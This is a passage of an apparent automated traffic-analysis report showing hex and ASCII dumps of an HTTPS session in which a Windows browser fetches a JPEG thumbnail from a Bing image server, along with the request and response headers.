                                                                                                                                                                                                                                                                                                2024-12-20 06:31:12 UTC16384INData Raw: 37 4f e7 7f ac fb 3f 99 2c 5f eb 36 ff 00 7b fb 95 d6 9a 9a bc 5d d1 8b 4e 2e cc ea 23 8a 3f 3b 7b d9 cd 71 3f 97 e6 49 1f f1 d7 25 e3 8f 16 4f 2e a1 fd 91 04 df 67 b1 8e 4f 2e e6 3b 18 93 fd 21 d7 e6 ff 00 58 df f7 cd 6a 41 e2 a8 ec a1 be bd 7b 39 a4 9e da 3f 33 cb 8a 5f df 7f b9 e9 b6 b8 bf 0e 69 52 3f cf 3f 93 fb bd f2 7e ea 5d 89 fe ed 24 95 c4 dd ca fa 95 f6 a4 f7 72 4f f6 cd 43 fb 56 3f dd c7 fb a4 7f dd 7f 73 fd ba cd b1 8a c2 e2 6b 68 3f e3 ca c7 cc f2 ee 64 fb f3 46 ff 00 c5 f2 d5 df 17 4b b2 d3 7d af fc f4 fd df f7 ff 00 ef aa ab e1 c8 2c 2e 35 6d ef 37 97 e6 7f ac 92 e7 ff 00 1f f7 a7 a4 55 c9 95 9b 3a 1f 0a df 68 b1 5d 5b 5a a5 9e a1 6f e6 7e ee 4b 98 ae fc e7 93 fe fa 55 5f fc 7a b5 27 96 d2 de 19 1e d7 58 d3 f5 1f b4 5b 7f c7 b5 b7 9c ef 24
                                                                                                                                                                                                                                                                                                Data Ascii: 7O?,_6{]N.#?;{q?I%O.gO.;!XjA{9?3_iR??~]$rOCV?skh?dFK},.5m7U:h][Zo~KU_z'X[$
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:12 UTC16384INData Raw: 0d 7b 4d fb 1c f1 de bc 72 59 5c c4 97 30 fc bf ea e6 59 13 6b 26 e6 fe 3a 9f c5 4a 91 7f c4 d2 d7 52 d4 2e 23 93 f7 77 b6 5e 6a 4d fe b3 f8 9f e6 db f7 bf 8e bb 64 e1 7b c8 23 b2 3b 29 34 88 df e7 b5 9b cc 93 cb f3 24 b6 97 e7 ff 00 81 27 f9 dd 59 b2 45 e5 7c ff 00 be 8f fe ba fd ca c7 d1 f5 38 25 bb f2 20 86 ef 4e ba f3 12 e2 e6 3b eb 4d 89 23 c7 fb b7 5d fb be 49 17 fd 9a eb 27 d4 f6 79 96 b3 fe f2 38 e3 ff 00 9e bb 26 ff 00 73 e7 ac a5 84 84 d2 92 d0 15 93 68 c1 8e da 37 fd fc 10 c3 bf fd 5c 92 45 13 d3 7f e5 8c 88 90 c3 e7 c7 ff 00 3c bf fb 3e 2b 73 cf b4 f2 63 f2 3f 79 1c 92 7e ef ec df 27 f0 6e db b2 b3 e7 8e fe df cb d9 37 da 23 f2 ff 00 7b 6d 2e c4 ff 00 c7 eb 8e 54 5a 7b a2 b9 59 57 6f ee 7f 7f 37 97 27 fd 75 f9 ff 00 f1 ca 6c 70 5a 79 31 ef f3
                                                                                                                                                                                                                                                                                                Data Ascii: {MrY\0Yk&:JR.#w^jMd{#;)4$'YE|8% N;M#]I'y8&sh7\E<>+sc?y~'n7#{m.TZ{YWo7'ulpZy1
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:12 UTC16384INData Raw: 7a ff 00 e8 55 e0 4f e2 39 3c 29 a8 49 65 6b a9 6a da ae 9b 1f fc c3 65 8b fe 3d df fd bd db 87 fd f1 f2 d4 17 de 2c b4 4f 2f ec ba 0f d9 e0 f9 24 92 4f 37 64 3b fe f6 df 2f e6 54 ff 00 80 d6 d4 70 12 8a 5c b1 df a9 93 c4 5d de d7 3e 94 f1 c7 fc 2d 0f 0f f8 7a db 54 d0 7e 24 78 df 4e b1 b7 b9 4f b6 db 78 82 d2 da 69 b6 ca fb 15 3e d6 d3 18 fe 56 fe 06 65 6d bd 0d 67 f8 37 e2 a7 c4 2d 6e d2 39 f4 ed 4b e2 6d c5 8d e5 cf 97 1d cd 8c 56 0e e8 ff 00 f3 cf f7 bb 3c c5 ff 00 6d 7e ef ab 57 86 7c 21 f1 dd fe 9b 77 73 be 69 af 63 bd fd df 97 73 fe 93 0d c4 5b f7 3c 6f 13 a9 f9 bf ba ff 00 f2 cf ad 7a 9e 9b e1 cd 37 c6 be 5f 8b b5 ef b5 f8 aa 7d 3e f7 cb 8f 4d b6 b4 4b 84 b0 b0 78 7e 49 ee 6d 77 0f 95 7e 4d f3 c1 fc 55 bd 6f 6d 46 1f bd 97 ce ef fc d7 e2 cd 14 63
                                                                                                                                                                                                                                                                                                Data Ascii: zUO9<)Iekje=,O/$O7d;/Tp\]>-zT~$xNOxi>Vemg7-n9KmV<m~W|!wsics[<oz7_}>MKx~Imw~MUomFc
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:12 UTC16384INData Raw: d8 fd 7b fc fb ab 9a f8 89 65 77 61 69 65 ad f8 e3 58 ff 00 84 76 fb 4e ff 00 40 bd bd b6 d2 9e fa da 4b a8 ff 00 d5 79 9f 37 98 9f bb f9 3e e6 dd d5 ed 3a 6e af ae f9 d1 c9 a8 ea 57 76 f7 77 96 de 7d ce 8b 73 2f c9 27 95 f2 ef 85 7a 3a 7f e8 3b ff 00 d9 ac 5f f8 a6 3c 3b 37 f6 a7 89 ec f5 1d 53 c2 3e 36 33 49 7a 63 b4 9b ed 7e 1a d4 57 e7 f3 76 3e e5 f2 64 5d 9f df 1f ba 4a ca 85 4a b0 de d6 ee b4 7e 7f d5 8e 99 50 8d 38 f9 9e 19 27 85 f4 c6 d1 2f 74 eb 4d 7b c1 36 7a ac 71 25 dc 7a 8e 9b aa dc b5 cd dc 1f eb 7e 45 65 10 f2 bf 31 8f ef 54 37 9e 23 f0 b6 b1 a8 c7 a7 f8 d3 ce b8 d4 7c af 33 fe 12 bd 12 67 d9 a9 ee fb b2 5c c4 ff 00 37 99 fc 26 45 ff 00 81 2d 49 e3 15 b4 b4 ba d4 93 4e 87 4f bd b1 d2 b5 67 b7 b6 f2 a1 78 6e 7e cf fc 33 79 4b f2 7f ec bf bc
                                                                                                                                                                                                                                                                                                Data Ascii: {ewaieXvN@Ky7>:nWvw}s/'z:;_<;7S>63Izc~Wv>d]JJ~P8'/tM{6zq%z~Ee1T7#|3g\7&E-INOgxn~3yK
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:12 UTC16384INData Raw: 5a 84 94 a1 cb 7b e8 cf 95 35 2f 22 1d 3f 7c 10 fe ef fe 3d fc bf 37 7b ff 00 bd 50 6a b2 fe fa 37 49 a1 92 3f 2f f7 7f ba fe f7 fb 35 a3 f1 1a da 3d 33 c5 9a b6 97 fe 89 1c 76 fa 95 cc 7e 5d b4 bb d3 e5 7d bb 37 57 3f e6 c6 ff 00 24 16 7f b8 ff 00 d1 75 ec c6 d2 8f 32 3c a9 45 c6 4d 33 52 fa 08 e2 f2 dd 26 86 49 e4 ff 00 9e 5f 73 63 7d da d1 b1 d3 27 bd d3 ee 75 77 bc 8b ed 56 5f e9 16 51 cb 12 7f a5 ff 00 b1 b7 f8 17 d2 b3 b4 ab 19 1e 1f b5 7d 8e ee 4b 5f f5 77 32 5b 7d ff 00 f6 95 2b 53 52 9f 45 bb d3 f6 69 d3 6a 3e 45 bc 89 e5 db 5f 7d cf f6 93 e4 ff 00 be ab 19 54 69 d9 0a 4d da d6 08 fe 2b 78 86 ee 6b 6f b5 59 ff 00 a2 ff 00 ab bd f2 a2 d8 97 09 ff 00 b2 d1 e2 6d 3e d3 c4 7a b5 cc fe 1e 87 4f b7 b5 b8 b9 f3 2d a4 97 f7 2f ff 00 5c b7 7d d7 ae 73 ec
                                                                                                                                                                                                                                                                                                Data Ascii: Z{5/"?|=7{Pj7I?/5=3v~]}7W?$u2<EM3R&I_sc}'uwV_Q}K_w2[}+SREij>E_}TiM+xkoYm>zO-/\}s
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:12 UTC16069INData Raw: f0 ee b7 65 3e b1 35 bc 7a 8d 94 d1 ea 56 d1 4b b1 2e 2c a3 4f b4 fc ac ff 00 ed 7f 0a fd ef 5a 72 8a be a8 b4 f4 68 f3 cb ad 52 e2 78 f6 cd 3d a8 f3 23 f2 24 22 d1 13 7a ff 00 b7 fe 35 02 79 71 7c 89 e7 79 72 7f 9f 92 a4 ba 6b 44 9b cf b2 ff 00 48 8f fe 9a c5 b1 ea 68 e4 ff 00 89 1d cd af 93 e6 49 e6 24 96 df df 8d ff 00 dd ab 8c 52 31 69 5c 76 aa b7 7a 7f 97 a7 fd b3 cb 8f cc fb 45 b4 91 7f b5 fe d5 57 d1 f4 c9 ee 2e fc f9 ff 00 79 1c 77 29 e6 7f d3 4a b5 1c 57 da c5 ac 9f e8 73 79 96 ff 00 ea e3 8a ba 6f 0e 68 71 db da 58 d9 5e e9 b7 72 7d a2 47 fb 4f 95 fd cf fe 28 7f e3 d5 5a 9a 5a e7 41 1f 87 20 bb 9a fa f6 f6 f2 69 20 8f 7d bd b5 b4 b2 fe fa 3f 93 7e d8 ff 00 bf 5e 65 7d 6d 1c 5a 86 a5 03 c3 f6 29 3f d5 c7 1c bf 7f 65 7b ae ab 69 f6 bf 06 d8 e9 df
                                                                                                                                                                                                                                                                                                Data Ascii: e>5zVK.,OZrhRx=#$"z5yq|yrkDHhI$R1i\vzEW.yw)JWsyohqX^r}GO(ZZA i }?~^e}mZ)?e{i
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:12 UTC16384INData Raw: bd 5e 7d a5 58 cf a8 6a 11 da da c3 f6 89 e4 97 cb 8e 38 be fc 95 d3 4f 6d e5 43 25 96 b7 0c d6 f3 c9 1f 97 e6 c7 2a 3f 98 eb fd d7 a2 f6 5a b1 9b df 0f 75 cb 4b 8f 16 5c de eb 70 cd 24 7f 66 9a 38 e3 fb 27 9d f6 cf 33 e4 d9 fe f2 7f ac 1f c5 f2 57 7f e2 fd 68 6b 7f 09 3c 63 e1 df 11 6b 1f da b7 5a 7f 86 3c fb 9f f4 57 67 b3 d4 ad b5 0f dd 6d f3 3e 74 dc 92 3e ec b7 f1 d7 8a e8 ed 25 94 d6 de 7d e7 ee 3c d4 93 fd 6e ff 00 9d 7f 89 76 d7 b8 f8 6f 4c d3 25 f8 19 e3 67 49 be d3 fd b5 a2 df c9 2e ad f3 cd 71 f6 d8 b6 4b b3 77 46 85 e1 eb fc 5e 65 79 b8 88 c7 49 ae eb f3 3b 28 c9 b8 b5 dc f9 72 36 82 e2 6f f5 3f bc ff 00 9e 75 e8 7e 07 b3 bf b7 d2 6c 6e a0 d1 fe db 25 bc 9f 68 f2 e2 ff 00 8f 98 e2 5f e2 5f f7 6b 8d d3 6d a4 96 68 d1 21 f3 3c c8 fc ca ea 2d 7c
                                                                                                                                                                                                                                                                                                Data Ascii: ^}Xj8OmC%*?ZuK\p$f8'3Whk<ckZ<Wgm>t>%}<nvoL%gI.qKwF^eyI;(r6o?u~ln%h__kmh!<-|
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:12 UTC16384INData Raw: 50 da 59 7d 8b fe 3d af 65 bb 7f 3a e3 fd af bb b6 ab 11 5b 11 2a 69 7b 3d 3f 21 72 c3 73 5b 5c 6d 0a ee ef fb 53 fb 1e d2 e2 fa 48 d2 d2 4b 2b 9b 47 d9 1f 95 f2 c7 e5 b6 ef ee fc df ed 56 76 ab 7d e3 38 b5 0f 3e 7f b2 79 97 11 fd 93 fd 1a 5f 9f ca 5f 9b 63 4a bc 3d 62 da fc 41 9f fe 3d 67 9b ed 10 7f d8 3d 36 7c df dc df f7 2b b8 f0 ce 87 fd a1 a7 db 6b 76 ba c4 3f 61 93 c9 8e 48 e5 b4 4f f8 16 c8 7f bb 5e 7d 69 d5 a4 bf 7b b7 99 52 8a 69 24 89 34 a9 74 dd 33 49 93 ec b7 90 dc 79 92 7d ae da da e6 57 79 be 64 ff 00 9e ab b7 cd f5 ff 00 66 9f 3d b6 85 e4 df 6b d7 53 43 71 05 bc 7f f2 cf e7 b8 93 fe ba 22 7c bb 7c ef bb 96 de ca 95 43 5c b6 d2 6e 3c c9 e0 9b ed 17 5e 63 c9 27 9b 2f fd fb ff 00 80 fa d7 39 e3 8d 3e d2 f6 5f f8 4a 2d 7c 55 77 a5 5f 79 89 1c
                                                                                                                                                                                                                                                                                                Data Ascii: PY}=e:[*i{=?!rs[\mSHK+GVv}8>y__cJ=bA=g=6|+kv?aHO^}i{Ri$4t3Iy}Wydf=kSCq"||C\n<^c'/9>_J-|Uw_y


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                9192.168.2.649733150.171.27.10443
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:11 UTC346OUTGET /th?id=OADD2.10239360433543_1F4HJPO10Z3VYH0SK&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                                                                                                                Host: tse1.mm.bing.net
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:12 UTC854INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                                Content-Length: 688476
                                                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                                                                                                                                                                NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                X-MSEdge-Ref: Ref A: 3BB0C3FFDFB34C628DE551FFE1710E1A Ref B: EWR30EDGE0408 Ref C: 2024-12-20T06:31:12Z
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:11 GMT
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:12 UTC15530INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 17 9c 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 34 2e 34 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 30 35 3a 31 33 20 31 38 3a 31 31 3a 34 32 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 04 38 a0 03 00 04 00 00 00 01 00 00 07 80 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01
                                                                                                                                                                                                                                                                                                Data Ascii: JFIF``ExifMM*bj(1r2i``Adobe Photoshop 24.4 (Windows)2023:05:13 18:11:428
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:12 UTC16384INData Raw: 00 35 2a 48 da 9b 45 00 3b 77 bd 36 4a 6d 14 00 ea 29 bb a8 dd 40 0e a2 9b ba 9d 40 05 3a 9b 4e db 40 05 49 cd 26 ca 65 48 12 73 4e 4a 6f 34 e4 a0 07 51 44 74 50 03 76 9a 93 6d 36 a5 8e 80 08 e2 a9 63 5a 29 d1 b5 43 76 28 5f 2a 9d 1a d1 be 9f 1b 54 b7 70 1d 1a d4 b1 ad 45 ba 9d 1b 54 b1 a2 68 d6 a7 8d 6a 28 da a5 8e a5 8c 96 35 a9 7c aa 62 55 a8 16 b2 6c d0 83 ca 92 9f 1f 98 9f 7e ae 6d a8 a7 8b fe 5a 54 a9 5c 76 19 bb de 8d de f5 1e d3 46 d3 4e c2 1d 23 51 ba 9d 1c 54 dd b4 c0 97 7d 1e 6d 45 22 d1 b6 4a 00 97 7d 45 ba 9b b4 d3 b6 d0 26 ec 12 35 44 ed 4f 91 6a bc 8b 56 95 88 09 1b 7d 44 eb be 9f 45 58 15 e4 5a af b6 ad 3d 41 25 51 23 24 5a 29 b2 35 36 46 ad 00 75 1f f2 c6 a2 df 4d f3 69 d8 91 ce d5 14 94 d9 1a 87 ab 12 77 0a 63 b5 1b e9 9b bd e9 a5 72 06
                                                                                                                                                                                                                                                                                                Data Ascii: 5*HE;w6Jm)@@:N@I&eHsNJo4QDtPvm6cZ)Cv(_*TpEThj(5|bUl~mZT\vFN#QT}mE"J}E&5DOjV}DEXZ=A%Q#$Z)56FuMiwcr
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:12 UTC16384INData Raw: 3b cc 8f cc 8e 39 62 de ff 00 f8 ed 79 7f 8e 3e 2c ea d7 10 f9 1e 06 d1 ee ec ad 3e 7f 32 f7 e4 fb 4e cf cb 72 7f c0 3f 3a e2 fc 79 f1 6f 52 bb f1 b4 7f da 9a 3d a6 a3 a3 dc 46 92 59 7d 86 5f f8 f0 fe ff 00 df c6 e6 ff 00 7a b2 f5 2d 3e ef 53 bb 8f 57 82 6b bf 3e e3 fe 59 f9 df 66 4f f6 55 e5 dd f2 2d 73 62 33 dc d7 13 04 aa 7b 91 7d bf cf 71 c7 01 46 32 f7 53 f9 99 f3 5f 5f a4 32 ea 3f 63 d4 3e d5 ff 00 3f 37 31 6c 7d bf f5 d5 f9 dd fe d5 1a e5 b4 69 6b 1e a3 e2 5b 39 a4 fd df ee ef 6e 7f d2 6c ff 00 d9 ff 00 57 ff 00 b3 2d 66 78 c7 50 8f fb 47 ec ba a6 83 36 83 a9 59 7f c7 ce a3 63 a8 79 df 68 fe fa b6 fc 8d d5 52 fb 57 f0 be 9f 0c 73 e8 30 dd dc 79 9f bb 93 ed da 86 f4 ff 00 b6 8b d2 b8 a3 09 dd 4b 77 fd 75 36 8d a3 a1 d7 78 57 c4 7a 17 8c 3e dd a5 ea
                                                                                                                                                                                                                                                                                                Data Ascii: ;9by>,>2Nr?:yoR=FY}_z->SWk>YfOU-sb3{}qF2S__2?c>?71l}ik[9nlW-fxPG6YcyhRWs0yKwu6xWz>
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:12 UTC16384INData Raw: 45 13 ff 00 a3 ff 00 bb fe d0 ae 83 c6 3a 86 9b fd 89 73 3d 97 fa 3c 92 5c ff 00 c7 b7 c9 0b dc 45 bf f7 7b bf dc ab 1e 20 83 49 d5 74 3f 0f e9 da 46 8f 0d 96 ab 1c 93 5b ea 57 31 45 b1 ef f7 3e e8 5b 73 36 d5 6f e0 da b5 7f c6 36 d0 6a 16 97 3f f2 0f fd e7 fa bb 98 bf 72 96 ef bf cb f9 9b 1f 3c 8f fc 5f dd 6a d6 e9 b3 39 45 dc f2 c8 fc b9 6e f6 79 d0 c7 e6 7f cb 4a da 93 50 91 34 98 e0 79 bf 7f 6f bf fd 1a 2f fe 29 6b 36 eb 4a 48 b5 c9 2c bf 7d ff 00 3c ff 00 7b f2 7f bd 57 34 dd 2a d3 ce 8e 77 86 6f 2f fe 79 fd f7 93 fd ad ab fc 34 a4 d3 5b 8a 17 4c f7 bf 80 3f 13 75 2d 77 e2 45 b6 89 af 4d 69 71 3c 9a 6a 59 ff 00 69 7f a9 b9 b7 95 7e 4f de ef e2 4c fd d6 aa ff 00 b4 47 85 74 9b 7f 13 69 be 35 f0 be 9b a8 47 a1 de 7f a3 ea 51 cb 2f ef ac 2e 23 fe e7 fb
                                                                                                                                                                                                                                                                                                Data Ascii: E:s=<\E{ It?F[W1E>[s6o6j?r<_j9EnyJP4yo/)k6JH,}<{W4*wo/y4[L?u-wEMiq<jYi~OLGti5GQ/.#
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:12 UTC16384INData Raw: 49 26 9d 72 97 11 ea 51 45 bf cb 4d ff 00 3f fb 91 6d f9 7f fa d5 f3 15 a6 a5 52 51 3d 9a 31 d1 3e 87 5d e5 41 7b ab 6c 79 a1 d2 af ac ad a6 b8 8f ec df 7e 39 63 b6 d8 af f2 fd f5 f2 fe 5d b5 97 e1 5f 09 dd da 5a 78 83 4b f1 2d e6 ad 71 1c 76 56 d7 f6 57 3e 6f 93 35 a5 bc bf 3c 29 f2 ff 00 c0 d0 ad 6c 78 56 0f b6 dd f8 82 f7 f7 52 5d 69 de 4c 71 c9 2c 49 fc 53 7f 0b 7f 74 a5 41 fd af 26 9f a1 ea df 62 bc 9a f6 ea e3 40 bc fb 37 da 7e 4f b5 c5 1d cf 98 d1 7f bf 1f 99 2e da eb cb a9 29 50 52 9e ac c3 15 27 19 e9 b1 e1 5e 07 d0 e0 d0 be 2c 5b 69 7a 75 e4 d2 69 de 22 8e ce ee da 4f f5 3f 6b 4d 9e 6f df ff 00 7f e4 ac d4 6b bf 0e 6b 96 d6 b3 d9 ff 00 68 e8 f7 1a b7 fc 4a 6e 62 97 f7 d1 db ba 6c f2 e3 fe 2f e3 af 46 d4 ac 6f ed 21 f0 6c c9 0c 3e 66 9d 73 73 a6
                                                                                                                                                                                                                                                                                                Data Ascii: I&rQEM?mRQ=1>]A{ly~9c]_ZxK-qvVW>o5<)lxVR]iLq,IStA&b@7~O.)PR'^,[izui"O?kMokkhJnbl/Fo!l>fss
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:12 UTC16384INData Raw: 93 56 d6 6d e4 b9 78 e3 b7 8f c9 9a 19 3f 8d bf 7f 12 fc 9b be f2 d2 58 85 45 da ab b3 1f b1 72 7e e9 f3 d4 6d a2 ff 00 67 dc cf a8 c3 fd b5 07 97 fb c8 ee 77 c3 35 bf f7 76 7f b3 59 7a 3c fa 4c 56 97 36 b6 b6 7f 68 ff 00 96 9e 67 dc 7f ff 00 66 be a1 93 f6 59 f0 f4 57 77 33 f8 53 c7 9a e6 9d 1d bc 8f 1f 97 a9 69 e9 37 f0 7f 0f dd df 11 ae 47 58 fd 9a a4 d0 b4 f9 75 ed 2f e2 47 87 af 2c 6c bf e3 f6 58 f4 a9 a6 fb 22 ec ff 00 96 89 0b 3e c5 a7 0c 7e 16 53 74 e3 53 56 29 e1 ea 24 e4 d1 e1 92 34 17 16 97 37 ba 77 9d 71 1c 71 ff 00 a4 c7 2c 49 be 3f ee 7f c0 6b 9f b5 9e ed e1 fb 13 c3 fb fb 89 3c cf 33 ca fe 0f ee d7 b4 e9 7f 01 be 24 8b 39 35 4f 0f 5a 69 3a f5 ac 7b fc bb 9d 23 56 49 92 ef fb eb e5 fc bf 77 bf f1 2d 70 7e 38 f8 73 e2 ff 00 0b ea d6 d6 be 35
                                                                                                                                                                                                                                                                                                Data Ascii: Vmx?XEr~mgw5vYz<LV6hgfYWw3Si7GXu/G,lX">~StSV)$47wqq,I?k<3$95OZi:{#VIw-p~8s5
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:12 UTC16384INData Raw: 4d fd 97 b5 3f 0f 4b a7 f8 83 48 7b c9 a3 8f cb bc bf b9 fb 34 af be 3b 5f b1 c9 12 35 be df bf f3 75 dd 5d 17 c4 6b 9b ed 63 e0 ed b4 96 5f e8 df 69 91 35 bb df 2b 62 4d 69 2c 56 69 04 aa 90 ff 00 d3 45 f2 9f fd aa e7 a9 2e 69 dd ad 4d 21 78 c4 bf f1 6e e6 0d 37 f6 71 f1 25 aa 59 dd ea b1 c7 e2 3b 6f b3 79 72 a4 37 1a 65 bc 49 1c 36 f2 ed eb f3 79 55 f3 a6 87 e2 ad 77 fe 12 6f f8 9b c3 a8 6b 56 bf 3f 99 6d 2c af e7 7f b5 e5 3f 5a fa 3b e2 dc e9 e0 af d9 ae db 54 bd bc 9a e3 c4 7f 11 2c be c9 6f 73 6d 2f ee 60 66 99 6e 37 fc fc ec db d7 fd aa f9 af 4a bc bf 8a d2 3b 5d 22 1b b9 27 92 37 92 f6 e6 58 be 7d ff 00 f4 c9 ba f0 b5 34 e9 a7 19 3e 5b ad 8e 7c 54 bd f5 e8 58 be 5b 4d 3e ef 66 b7 0d df 9f 24 9e 65 b5 97 df 7b 78 a4 fe ff 00 fb 55 72 3f 14 78 6a ef
                                                                                                                                                                                                                                                                                                Data Ascii: M?KH{4;_5u]kc_i5+bMi,ViE.iM!xn7q%Y;oyr7eI6yUwokV?m,?Z;T,osm/`fn7J;]"'7X}4>[|TX[M>f$e{xUr?xj
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:12 UTC16067INData Raw: be ff 00 85 8f e3 cd 37 5e fe d2 d1 34 1b e9 34 9b 6b 0b 99 7f e7 e2 58 93 f7 d7 1f ed 7a 7c fb 77 6c af 99 c4 64 78 69 62 9c ee d7 a6 96 ec 7a 11 af 3e 4b 1e 89 a9 78 43 43 d1 7e 36 69 3e 15 d1 be 29 f8 ef 4a 83 54 8d 27 f0 c4 56 c5 2f b4 e9 e7 4f f9 77 8e 49 5f f8 3e e6 c7 ad df 80 ff 00 18 7c 43 07 8f 3c 49 e0 df 10 e8 ff 00 db 3a 97 da 5d 22 b7 be b4 fb 26 a5 3c 49 ff 00 2c 5d 79 56 da bf 32 fc d5 85 f1 db 50 f0 f6 93 a8 5c de d9 4d ae 78 ae 08 ec ad b5 bb db 69 2e fe d1 a5 c7 e6 fe e9 d9 76 ae fb 39 bf 8e 37 dd f2 d7 87 41 e2 fd 5a de 1f b5 69 7e 24 f1 0c 77 52 48 91 f9 97 df 3b dc 22 bf 9b 0c 5e 77 f7 77 fd ea ba 39 7a ac ad 51 37 65 6b bd ee ba 99 7b 6f 67 3b 5d 5b b2 3e b9 9f c8 b8 9a 4b a8 26 9b 4e fe d1 d4 a1 93 ed 37 3f 3a 5d a7 f7 a4 6f f6 7f
                                                                                                                                                                                                                                                                                                Data Ascii: 7^44kXz|wldxibz>KxCC~6i>)JT'V/OwI_>|C<I:]"&<I,]yV2P\Mxi.v97AZi~$wRH;"^ww9zQ7ek{og;][>K&N7?:]o
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:12 UTC16384INData Raw: a2 38 e5 ff 00 53 fb bf fd 0a b7 be 3d 6a ff 00 d9 ff 00 f0 8f ec d1 ed 2e 35 28 ec a6 93 ec 52 c5 fb 9b 44 6c 7e f3 cb 5f f5 6f fe cb 55 af 87 ba 2c e9 f1 4b 56 4b af f4 8b ad 26 e6 1b 8f fa e8 ed f7 77 57 33 a9 6a 1a b2 7c 4d d4 a0 f0 6f 9d 71 25 be ac f7 16 d2 fd 91 2e 7c c7 57 dd f3 b3 7d ff 00 9b fb d5 cf 5e ed 59 17 14 ef b9 89 3f 8a bc 50 9a 7f f6 5d ec 33 47 6b 65 be e2 da da 28 93 c9 b7 f3 3e 6d db 6b 9e be 9e 07 ba 92 e9 fc e9 24 ff 00 be 2b ae d4 97 c4 32 dd df 41 e2 58 66 93 52 d6 ae 5e ee 49 25 95 36 5c 7f b3 b3 fb f5 87 7d e4 7e ee 0f ec df 2d fc c7 f2 ee 7f e7 a2 7f 77 f0 ac 22 92 5b 1a 6a c7 69 5e 2c d4 ad 26 92 ea ca cf 49 92 4b 88 fc b9 3e d3 a7 a4 df fa 1f f1 54 7a 97 f6 ee ab a7 dc eb 77 53 4d e5 c7 22 79 92 7d cf de b7 f0 fc bf ec d5
                                                                                                                                                                                                                                                                                                Data Ascii: 8S=j.5(RDl~_oU,KVK&wW3j|Moq%.|W}^Y?P]3Gke(>mk$+2AXfR^I%6\}~-w"[ji^,&IK>TzwSM"y}
